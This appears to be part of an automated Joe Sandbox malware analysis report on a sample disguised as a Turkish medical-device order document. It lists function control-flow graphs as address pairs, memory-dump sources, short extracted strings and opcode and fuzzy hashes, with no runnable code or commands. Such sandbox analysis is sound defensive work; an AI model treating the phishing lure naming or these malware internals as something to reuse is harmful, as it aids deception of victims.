                                                                                                  control_flow_graph 2274 29aca08-29aca38 2276 29aca3a 2274->2276 2277 29aca3f-29acb1c call 29a41a0 call 29a3cc0 2274->2277 2276->2277 2287 29acb1e 2277->2287 2288 29acb23-29acb44 call 29a5658 2277->2288 2287->2288 2290 29acb49-29acb54 2288->2290 2291 29acb5b-29acb5f 2290->2291 2292 29acb56 2290->2292 2293 29acb61-29acb62 2291->2293 2294 29acb64-29acb6b 2291->2294 2292->2291 2295 29acb83-29acbc7 2293->2295 2296 29acb6d 2294->2296 2297 29acb72-29acb80 2294->2297 2301 29acc2d-29acc44 2295->2301 2296->2297 2297->2295 2303 29acbc9-29acbdf 2301->2303 2304 29acc46-29acc6b 2301->2304 2308 29acc09 2303->2308 2309 29acbe1-29acbed 2303->2309 2310 29acc6d-29acc82 2304->2310 2311 29acc83 2304->2311 2314 29acc0f-29acc2c 2308->2314 2312 29acbef-29acbf5 2309->2312 2313 29acbf7-29acbfd 2309->2313 2310->2311 2315 29acc07 2312->2315 2313->2315 2314->2301 2315->2314
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: 914d8d81444b0290c032bdb1bfdcefb62057b303811b2b9f0080b0db535a05e1
                                                                                                  • Instruction ID: 769fdb42d311742df0b003bf36d01230d2331500722630e33455e7958c071e0d
                                                                                                  • Opcode Fuzzy Hash: 914d8d81444b0290c032bdb1bfdcefb62057b303811b2b9f0080b0db535a05e1
                                                                                                  • Instruction Fuzzy Hash: D481B174E00218DFEB14DFAAD994A9DBBF2BF88300F14C46AE419AB365DB709941CF50
                                                                                                  Function 029AD278 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2407 29ad278-29ad2a8 2408 29ad2aa 2407->2408 2409 29ad2af-29ad38c call 29a41a0 call 29a3cc0 2407->2409 2408->2409 2419 29ad38e 2409->2419 2420 29ad393-29ad3b4 call 29a5658 2409->2420 2419->2420 2422 29ad3b9-29ad3c4 2420->2422 2423 29ad3cb-29ad3cf 2422->2423 2424 29ad3c6 2422->2424 2425 29ad3d1-29ad3d2 2423->2425 2426 29ad3d4-29ad3db 2423->2426 2424->2423 2427 29ad3f3-29ad437 2425->2427 2428 29ad3dd 2426->2428 2429 29ad3e2-29ad3f0 2426->2429 2433 29ad49d-29ad4b4 2427->2433 2428->2429 2429->2427 2435 29ad439-29ad44f 2433->2435 2436 29ad4b6-29ad4db 2433->2436 2439 29ad479 2435->2439 2440 29ad451-29ad45d 2435->2440 2442 29ad4dd-29ad4f2 2436->2442 2443 29ad4f3 2436->2443 2446 29ad47f-29ad49c 2439->2446 2444 29ad45f-29ad465 2440->2444 2445 29ad467-29ad46d 2440->2445 2442->2443 2447 29ad477 2444->2447 2445->2447 2446->2433 2447->2446
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: eab0f0e852c3fa4c5d77538fd4cd98b2c3c2a390c5f519a147130621be6f8c77
                                                                                                  • Instruction ID: 1c42bcf45102fbfb09b902abc3d23b32d79737b079e45cae67d9c48bc433fbe8
                                                                                                  • Opcode Fuzzy Hash: eab0f0e852c3fa4c5d77538fd4cd98b2c3c2a390c5f519a147130621be6f8c77
                                                                                                  • Instruction Fuzzy Hash: 0181A474E00218DFEB18DFAAD994A9DBBF2BF88304F148069D419AB365DB709945CF60
                                                                                                  Function 029AC738 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2319 29ac738-29ac768 2320 29ac76a 2319->2320 2321 29ac76f-29ac84c call 29a41a0 call 29a3cc0 2319->2321 2320->2321 2331 29ac84e 2321->2331 2332 29ac853-29ac874 call 29a5658 2321->2332 2331->2332 2334 29ac879-29ac884 2332->2334 2335 29ac88b-29ac88f 2334->2335 2336 29ac886 2334->2336 2337 29ac891-29ac892 2335->2337 2338 29ac894-29ac89b 2335->2338 2336->2335 2339 29ac8b3-29ac8f7 2337->2339 2340 29ac89d 2338->2340 2341 29ac8a2-29ac8b0 2338->2341 2345 29ac95d-29ac974 2339->2345 2340->2341 2341->2339 2347 29ac8f9-29ac90f 2345->2347 2348 29ac976-29ac99b 2345->2348 2352 29ac939 2347->2352 2353 29ac911-29ac91d 2347->2353 2357 29ac99d-29ac9b2 2348->2357 2358 29ac9b3 2348->2358 2356 29ac93f-29ac95c 2352->2356 2354 29ac91f-29ac925 2353->2354 2355 29ac927-29ac92d 2353->2355 2359 29ac937 2354->2359 2355->2359 2356->2345 2357->2358 2359->2356
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: 78fb7cf3be48962c04c076f3336393f3ad816db7138082414319ed2793161107
                                                                                                  • Instruction ID: 1b3d53ec1b1776755bdcad27dc5c5364d045d6850cc58046d692eeaf5cef04cc
                                                                                                  • Opcode Fuzzy Hash: 78fb7cf3be48962c04c076f3336393f3ad816db7138082414319ed2793161107
                                                                                                  • Instruction Fuzzy Hash: 6E818074E00218DFEB14DFAAD994B9DBBF2BF88300F15806AE419AB365DB709941CF51
                                                                                                  Function 029ACCD8 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2363 29accd8-29acd08 2364 29acd0a 2363->2364 2365 29acd0f-29acdec call 29a41a0 call 29a3cc0 2363->2365 2364->2365 2375 29acdee 2365->2375 2376 29acdf3-29ace14 call 29a5658 2365->2376 2375->2376 2378 29ace19-29ace24 2376->2378 2379 29ace2b-29ace2f 2378->2379 2380 29ace26 2378->2380 2381 29ace31-29ace32 2379->2381 2382 29ace34-29ace3b 2379->2382 2380->2379 2383 29ace53-29ace97 2381->2383 2384 29ace3d 2382->2384 2385 29ace42-29ace50 2382->2385 2389 29acefd-29acf14 2383->2389 2384->2385 2385->2383 2391 29ace99-29aceaf 2389->2391 2392 29acf16-29acf3b 2389->2392 2396 29aced9 2391->2396 2397 29aceb1-29acebd 2391->2397 2399 29acf3d-29acf52 2392->2399 2400 29acf53 2392->2400 2398 29acedf-29acefc 2396->2398 2401 29acebf-29acec5 2397->2401 2402 29acec7-29acecd 2397->2402 2398->2389 2399->2400 2403 29aced7 2401->2403 2402->2403 2403->2398
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: 578cbcdcf945d51103e8237c1ec115e4daa8c04bf55fd857d5f8edde894eeaca
                                                                                                  • Instruction ID: 8d3a72e1f4e0d4a76a87600550e19ad9fe9830a9ed125f3a5c4f9884d5f4df9e
                                                                                                  • Opcode Fuzzy Hash: 578cbcdcf945d51103e8237c1ec115e4daa8c04bf55fd857d5f8edde894eeaca
                                                                                                  • Instruction Fuzzy Hash: 97819374E00218DFEB14DFAAD994A9DBBF2BF88300F24C06AE419AB365DB705945CF51
                                                                                                  Function 029ACFAA Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2451 29acfaa-29acfd8 2452 29acfda 2451->2452 2453 29acfdf-29ad0bc call 29a41a0 call 29a3cc0 2451->2453 2452->2453 2463 29ad0be 2453->2463 2464 29ad0c3-29ad0e4 call 29a5658 2453->2464 2463->2464 2466 29ad0e9-29ad0f4 2464->2466 2467 29ad0fb-29ad0ff 2466->2467 2468 29ad0f6 2466->2468 2469 29ad101-29ad102 2467->2469 2470 29ad104-29ad10b 2467->2470 2468->2467 2471 29ad123-29ad167 2469->2471 2472 29ad10d 2470->2472 2473 29ad112-29ad120 2470->2473 2477 29ad1cd-29ad1e4 2471->2477 2472->2473 2473->2471 2479 29ad169-29ad17f 2477->2479 2480 29ad1e6-29ad20b 2477->2480 2484 29ad1a9 2479->2484 2485 29ad181-29ad18d 2479->2485 2486 29ad20d-29ad222 2480->2486 2487 29ad223 2480->2487 2490 29ad1af-29ad1cc 2484->2490 2488 29ad18f-29ad195 2485->2488 2489 29ad197-29ad19d 2485->2489 2486->2487 2491 29ad1a7 2488->2491 2489->2491 2490->2477 2491->2490
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: 01f7f8285b11a78268ace8bcdf9fb816004fcd47500c4ad847681e295628eda4
                                                                                                  • Instruction ID: 569a3541c3c354fe333aaa37aa14fd088c6c128dea81c93ec7e8545b9f645f8b
                                                                                                  • Opcode Fuzzy Hash: 01f7f8285b11a78268ace8bcdf9fb816004fcd47500c4ad847681e295628eda4
                                                                                                  • Instruction Fuzzy Hash: B381A274E00218DFEB18DFAAD994A9DBBF2BF88300F148069E419AB365DB709945CF50
                                                                                                  Function 05569548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3765414670.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_5560000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b8cd6a023c1af390ee0b37c2322652876da780b57ca91ca5cfffb9a7f932ed25
                                                                                                  • Instruction ID: 0486f12ead01ce4267a6e89aaa79f3c2bd2d6e008e2a5734872518a73a1d48ad
                                                                                                  • Opcode Fuzzy Hash: b8cd6a023c1af390ee0b37c2322652876da780b57ca91ca5cfffb9a7f932ed25
                                                                                                  • Instruction Fuzzy Hash: 7FF1E274E00258CFDB14DFA9C984B9DBBF2BF88304F5481A9D848AB395DB749986CF50
                                                                                                  Function 029AE988 Relevance: .1, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fcde03898dacc8a28ecc7dd3af3c1e0ceadcbc77cfaa70f2dd89b5a4b50a95f3
                                                                                                  • Instruction ID: 92832d2fc0147a7832211bfca20d2e8c08429bfbbf5635f7ed2e26061210f0df
                                                                                                  • Opcode Fuzzy Hash: fcde03898dacc8a28ecc7dd3af3c1e0ceadcbc77cfaa70f2dd89b5a4b50a95f3
                                                                                                  • Instruction Fuzzy Hash: C1517474E00308DFEB18DFAAD594A9DBBF6BF89300F248129E815AB364DB305842CF54
                                                                                                  Function 029AE97A Relevance: .1, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cdb15a4313d2fc8e0ec63f243ccb8de57fba3127031df0ce9c365dd8dea8b3e1
                                                                                                  • Instruction ID: 617d9eca328f98cee2554509692e0d0458d42e7b28dfd8e3d9359dd9cf4436a0
                                                                                                  • Opcode Fuzzy Hash: cdb15a4313d2fc8e0ec63f243ccb8de57fba3127031df0ce9c365dd8dea8b3e1
                                                                                                  • Instruction Fuzzy Hash: BC519774E00308DFEB18DFAAD594A9DBBB2FF89300F248029E815AB365DB345842CF54
                                                                                                  Function 029A7700 Relevance: 10.4, Strings: 8, Instructions: 447COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 29a7700-29a7725 1 29a772b-29a774e 0->1 2 29a7b54-29a7b58 0->2 11 29a77fc-29a7800 1->11 12 29a7754-29a7761 1->12 3 29a7b5a-29a7b6e 2->3 4 29a7b71-29a7b7f 2->4 8 29a7bf0-29a7c05 4->8 9 29a7b81-29a7b96 4->9 20 29a7c0c-29a7c19 8->20 21 29a7c07-29a7c0a 8->21 22 29a7b98-29a7b9b 9->22 23 29a7b9d-29a7baa 9->23 15 29a7848-29a7851 11->15 16 29a7802-29a7810 11->16 24 29a7763-29a776e 12->24 25 29a7770 12->25 18 29a7c67 15->18 19 29a7857-29a7861 15->19 16->15 35 29a7812-29a782d 16->35 30 29a7c6c-29a7c83 18->30 19->2 26 29a7867-29a7870 19->26 27 29a7c1b-29a7c56 20->27 21->27 28 29a7bac-29a7bed 22->28 23->28 36 29a7772-29a7774 24->36 25->36 31 29a787f-29a788b 26->31 32 29a7872-29a7877 26->32 71 29a7c5d-29a7c64 27->71 31->30 39 29a7891-29a7897 31->39 32->31 57 29a783b 35->57 58 29a782f-29a7839 35->58 36->11 38 29a777a-29a77dc 36->38 82 29a77de 38->82 83 29a77e2-29a77f9 38->83 43 29a7b3e-29a7b42 39->43 44 29a789d-29a78ad 39->44 43->18 47 29a7b48-29a7b4e 43->47 55 29a78af-29a78bf 44->55 56 29a78c1-29a78c3 44->56 47->2 47->26 59 29a78c6-29a78cc 55->59 56->59 60 29a783d-29a783f 57->60 58->60 59->43 65 29a78d2-29a78e1 59->65 60->15 66 29a7841 60->66 68 29a798f-29a79ba call 29a7538 * 2 65->68 69 29a78e7 65->69 66->15 86 29a79c0-29a79c4 68->86 87 29a7aa4-29a7abe 68->87 72 29a78ea-29a78fb 69->72 72->30 75 29a7901-29a7913 72->75 75->30 77 29a7919-29a7931 75->77 140 29a7933 call 29a80d8 77->140 141 29a7933 call 29a7fa4 77->141 142 29a7933 call 29a7fe4 77->142 143 29a7933 call 29a8055 77->143 81 29a7939-29a7949 81->43 85 29a794f-29a7952 81->85 82->83 83->11 88 29a795c-29a795f 85->88 89 29a7954-29a795a 85->89 86->43 91 29a79ca-29a79ce 86->91 87->2 107 29a7ac4-29a7ac8 87->107 88->18 92 29a7965-29a7968 88->92 89->88 89->92 93 29a79d0-29a79dd 91->93 94 29a79f6-29a79fc 91->94 95 29a796a-29a796e 92->95 96 29a7970-29a7973 92->96 112 29a79df-29a79ea 93->112 113 29a79ec 93->113 98 29a79fe-29a7a02 94->98 99 29a7a37-29a7a3d 94->99 95->96 100 29a7979-29a797d 95->100 96->18 96->100 98->99 105 29a7a04-29a7a0d 98->105 103 29a7a49-29a7a4f 99->103 104 29a7a3f-29a7a43 99->104 100->18 101 29a7983-29a7989 100->101 101->68 101->72 108 29a7a5b-29a7a5d 103->108 109 29a7a51-29a7a55 103->109 104->71 104->103 110 29a7a0f-29a7a14 105->110 111 29a7a1c-29a7a32 105->111 114 29a7aca-29a7ad4 call 29a63e0 107->114 115 29a7b04-29a7b08 107->115 116 29a7a5f-29a7a68 108->116 117 29a7a92-29a7a94 108->117 109->43 109->108 110->111 111->43 118 29a79ee-29a79f0 112->118 113->118 114->115 128 29a7ad6-29a7aeb 114->128 115->71 119 29a7b0e-29a7b12 115->119 121 29a7a6a-29a7a6f 116->121 122 29a7a77-29a7a8d 116->122 117->43 124 29a7a9a-29a7aa1 117->124 118->43 118->94 119->71 126 29a7b18-29a7b25 119->126 121->122 122->43 131 29a7b27-29a7b32 126->131 132 29a7b34 126->132 128->115 137 29a7aed-29a7b02 128->137 134 29a7b36-29a7b38 131->134 132->134 134->43 134->71 137->2 137->115 140->81 141->81 142->81 143->81
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                  • API String ID: 0-2212926057
                                                                                                  • Opcode ID: 282bc64a1ef26db2e014cefab66129851af4c98916b00be31184603270dfeada
                                                                                                  • Instruction ID: 205aff04bc0fb3f3e59a528982bddceb2e54988ef7d2d89e36c6d793a6069cad
                                                                                                  • Opcode Fuzzy Hash: 282bc64a1ef26db2e014cefab66129851af4c98916b00be31184603270dfeada
                                                                                                  • Instruction Fuzzy Hash: 93124734A003099FDB24CFA9D8A5AEEBBF6BF88314F158559E4159B361DB30ED41CB90
                                                                                                  Function 029A76F1 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 587 29a76f1-29a7725 588 29a772b-29a774e 587->588 589 29a7b54-29a7b58 587->589 598 29a77fc-29a7800 588->598 599 29a7754-29a7761 588->599 590 29a7b5a-29a7b6e 589->590 591 29a7b71-29a7b7f 589->591 595 29a7bf0-29a7c05 591->595 596 29a7b81-29a7b96 591->596 607 29a7c0c-29a7c19 595->607 608 29a7c07-29a7c0a 595->608 609 29a7b98-29a7b9b 596->609 610 29a7b9d-29a7baa 596->610 602 29a7848-29a7851 598->602 603 29a7802-29a7810 598->603 611 29a7763-29a776e 599->611 612 29a7770 599->612 605 29a7c67 602->605 606 29a7857-29a7861 602->606 603->602 622 29a7812-29a782d 603->622 617 29a7c6c-29a7c83 605->617 606->589 613 29a7867-29a7870 606->613 614 29a7c1b-29a7c56 607->614 608->614 615 29a7bac-29a7bed 609->615 610->615 623 29a7772-29a7774 611->623 612->623 618 29a787f-29a788b 613->618 619 29a7872-29a7877 613->619 658 29a7c5d-29a7c64 614->658 618->617 626 29a7891-29a7897 618->626 619->618 644 29a783b 622->644 645 29a782f-29a7839 622->645 623->598 625 29a777a-29a77dc 623->625 669 29a77de 625->669 670 29a77e2-29a77f9 625->670 630 29a7b3e-29a7b42 626->630 631 29a789d-29a78ad 626->631 630->605 634 29a7b48-29a7b4e 630->634 642 29a78af-29a78bf 631->642 643 29a78c1-29a78c3 631->643 634->589 634->613 646 29a78c6-29a78cc 642->646 643->646 647 29a783d-29a783f 644->647 645->647 646->630 652 29a78d2-29a78e1 646->652 647->602 653 29a7841 647->653 655 29a798f-29a79ba call 29a7538 * 2 652->655 656 29a78e7 652->656 653->602 673 29a79c0-29a79c4 655->673 674 29a7aa4-29a7abe 655->674 659 29a78ea-29a78fb 656->659 659->617 662 29a7901-29a7913 659->662 662->617 664 29a7919-29a7931 662->664 727 29a7933 call 29a80d8 664->727 728 29a7933 call 29a7fa4 664->728 729 29a7933 call 29a7fe4 664->729 730 29a7933 call 29a8055 664->730 668 29a7939-29a7949 668->630 672 29a794f-29a7952 668->672 669->670 670->598 675 29a795c-29a795f 672->675 676 29a7954-29a795a 672->676 673->630 678 29a79ca-29a79ce 673->678 674->589 694 29a7ac4-29a7ac8 674->694 675->605 679 29a7965-29a7968 675->679 676->675 676->679 680 29a79d0-29a79dd 678->680 681 29a79f6-29a79fc 678->681 682 29a796a-29a796e 679->682 683 29a7970-29a7973 679->683 699 29a79df-29a79ea 680->699 700 29a79ec 680->700 685 29a79fe-29a7a02 681->685 686 29a7a37-29a7a3d 681->686 682->683 687 29a7979-29a797d 682->687 683->605 683->687 685->686 692 29a7a04-29a7a0d 685->692 690 29a7a49-29a7a4f 686->690 691 29a7a3f-29a7a43 686->691 687->605 688 29a7983-29a7989 687->688 688->655 688->659 695 29a7a5b-29a7a5d 690->695 696 29a7a51-29a7a55 690->696 691->658 691->690 697 29a7a0f-29a7a14 692->697 698 29a7a1c-29a7a32 692->698 701 29a7aca-29a7ad4 call 29a63e0 694->701 702 29a7b04-29a7b08 694->702 703 29a7a5f-29a7a68 695->703 704 29a7a92-29a7a94 695->704 696->630 696->695 697->698 698->630 705 29a79ee-29a79f0 699->705 700->705 701->702 715 29a7ad6-29a7aeb 701->715 702->658 706 29a7b0e-29a7b12 702->706 708 29a7a6a-29a7a6f 703->708 709 29a7a77-29a7a8d 703->709 704->630 711 29a7a9a-29a7aa1 704->711 705->630 705->681 706->658 713 29a7b18-29a7b25 706->713 708->709 709->630 718 29a7b27-29a7b32 713->718 719 29a7b34 713->719 715->702 724 29a7aed-29a7b02 715->724 721 29a7b36-29a7b38 718->721 719->721 721->630 721->658 724->589 724->702 727->668 728->668 729->668 730->668
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (oq$(oq$(oq$(oq
                                                                                                  • API String ID: 0-3853041632
                                                                                                  • Opcode ID: 4657b5a4b9133f87de9e6c46176c49bc77406b330631a61cd1455679cadbebe9
                                                                                                  • Instruction ID: 0d3f6c59e896e9572fdf63239a3679db5248d86ba33f0836e4e6ffa21a8cac7d
                                                                                                  • Opcode Fuzzy Hash: 4657b5a4b9133f87de9e6c46176c49bc77406b330631a61cd1455679cadbebe9
                                                                                                  • Instruction Fuzzy Hash: D6C13830A002099FDB24CFA9C995AEEFBF6BF88314F158559E855AB361D730ED41CB90
                                                                                                  Function 029A9A20 Relevance: 2.8, Strings: 2, Instructions: 341COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1862 29a9a20-29a9a31 1863 29a9adb 1862->1863 1864 29a9a37-29a9a3a 1862->1864 1866 29a9ae0-29a9b19 1863->1866 1864->1863 1865 29a9a40-29a9a58 1864->1865 1865->1863 1873 29a9a5e-29a9a62 1865->1873 1869 29a9b1b-29a9b21 1866->1869 1870 29a9b56 1866->1870 1872 29a9b24-29a9b26 1869->1872 1874 29a9b58-29a9b5f 1870->1874 1875 29a9b28-29a9b31 1872->1875 1876 29a9b65-29a9b99 1872->1876 1877 29a9a86-29a9a8c 1873->1877 1878 29a9a64 1873->1878 1879 29a9b33-29a9b43 1875->1879 1880 29a9b45-29a9b4f 1875->1880 1889 29a9b9b-29a9ba1 1876->1889 1890 29a9bf9-29a9c06 1876->1890 1877->1863 1882 29a9a8e-29a9a90 1877->1882 1881 29a9a67-29a9a6a 1878->1881 1879->1874 1885 29a9b60 1880->1885 1886 29a9b51-29a9b54 1880->1886 1881->1866 1884 29a9a6c-29a9a78 1881->1884 1887 29a9a92 1882->1887 1888 29a9ab4-29a9abb 1882->1888 1884->1863 1893 29a9a7a-29a9a80 1884->1893 1885->1876 1886->1870 1886->1872 1894 29a9a95-29a9a98 1887->1894 1888->1866 1891 29a9abd-29a9ac6 1888->1891 1896 29a9ba3-29a9baf 1889->1896 1897 29a9c17-29a9c51 1889->1897 1900 29a9c08-29a9c0f 1890->1900 1891->1863 1898 29a9ac8-29a9ad1 1891->1898 1893->1863 1899 29a9a82-29a9a84 1893->1899 1894->1866 1895 29a9a9a-29a9aa6 1894->1895 1895->1863 1901 29a9aa8-29a9aae 1895->1901 1902 29a9be8-29a9bf2 1896->1902 1903 29a9bb1-29a9bbb 1896->1903 1949 29a9c53 call 29a9a10 1897->1949 1950 29a9c53 call 29a9a20 1897->1950 1951 29a9c53 call 29a9b70 1897->1951 1898->1863 1904 29a9ad3-29a9ada 1898->1904 1899->1877 1899->1881 1901->1863 1905 29a9ab0-29a9ab2 1901->1905 1908 29a9c12 1902->1908 1909 29a9bf4-29a9bf7 1902->1909 1903->1902 1907 29a9bbd-29a9be6 1903->1907 1905->1888 1905->1894 1907->1900 1908->1897 1909->1889 1909->1890 1910 29a9c59-29a9c60 1912 29a9c6c-29a9c8c 1910->1912 1913 29a9c62-29a9c67 1910->1913 1917 29a9c8e-29a9c90 1912->1917 1918 29a9cc7-29a9cc9 1912->1918 1914 29a9d35-29a9d3c 1913->1914 1921 29a9c9f-29a9ca6 1917->1921 1922 29a9c92-29a9c97 1917->1922 1919 29a9ccb-29a9cd1 1918->1919 1920 29a9d30 1918->1920 1919->1920 1923 29a9cd3-29a9cee 1919->1923 1920->1914 1924 29a9d3f-29a9d6b call 29a9620 1921->1924 1925 29a9cac-29a9cc5 1921->1925 1922->1921 1930 29a9cf0-29a9cf2 1923->1930 1931 29a9d25-29a9d27 1923->1931 1936 29a9d79-29a9d82 call 29a9620 1924->1936 1937 29a9d6d-29a9d77 1924->1937 1925->1914 1933 29a9d01-29a9d08 1930->1933 1934 29a9cf4-29a9cf9 1930->1934 1931->1920 1935 29a9d29-29a9d2e 1931->1935 1933->1924 1938 29a9d0a-29a9d23 1933->1938 1934->1933 1935->1914 1943 29a9d90-29a9d99 1936->1943 1944 29a9d84-29a9d8e 1936->1944 1937->1936 1938->1914 1945 29a9da4-29a9dcd 1943->1945 1944->1943 1949->1910 1950->1910 1951->1910
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'q$4'q
                                                                                                  • API String ID: 0-1467158625
                                                                                                  • Opcode ID: 618fb7a59ce379878f9a906e465b360213dd9b0055ce318fe4ad660a1c5271f5
                                                                                                  • Instruction ID: d34925c87b4f7d68bc6551413dad807738597662373495f2f1c2aa786d08cdeb
                                                                                                  • Opcode Fuzzy Hash: 618fb7a59ce379878f9a906e465b360213dd9b0055ce318fe4ad660a1c5271f5
                                                                                                  • Instruction Fuzzy Hash: 84C1C0316007059FEB10CF68C894BAABBAAFF89314F14C566E9599B355D731EC42CBE0
                                                                                                  Function 029A5F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
